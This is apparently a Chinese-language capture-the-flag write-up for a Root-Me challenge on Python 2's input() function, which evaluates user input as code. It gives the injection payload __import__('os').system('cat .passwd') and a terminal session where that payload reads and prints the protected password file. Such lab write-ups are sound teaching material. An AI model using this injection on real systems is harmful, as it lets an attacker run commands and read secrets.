CTF-rootme 题解之Python - input()
LINK:https://www.root-me.org/en/Challenges/App-Script/Python-input
Reference:https://blog.51cto.com/12332766/2299894?cid=729687
SourceCode:
#!/usr/bin/python2 import sys def youLose(): print "Try again ;-)" sys.exit(1) try: p = input("Please enter password : ") except: youLose() with open(".passwd") as f: passwd = f.readline().strip() try: if (p == int(passwd)): print "Well done ! You can validate with this password !" except: youLose()
input()函数产生漏洞的原因:
python2中,此函数会将stdin输入的内容当做python代码去执行(就像执行计算式3+2一样,将其看做python代码,通过计算返回结果)
import():是python中的内置函数,同语法import 相同,都是调用模块
system()就是os模块中的方法,此方法用来调用系统命令
exploit: __import__('os').system('cat .passwd')
app-script-ch6@challenge02:~$ ./setuid-wrapper
Please enter password : __import__('os').system('cat .passwd')
13373439872909134298363103573901